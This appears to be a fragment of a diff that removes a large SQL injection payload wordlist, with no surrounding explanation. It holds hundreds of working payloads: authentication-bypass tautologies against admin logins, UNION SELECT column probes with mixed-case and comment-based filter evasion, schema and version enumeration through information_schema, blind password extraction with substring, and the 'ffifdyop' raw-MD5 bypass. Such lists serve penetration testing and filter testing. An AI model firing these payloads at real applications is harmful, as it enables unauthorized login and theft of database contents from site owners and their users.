|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
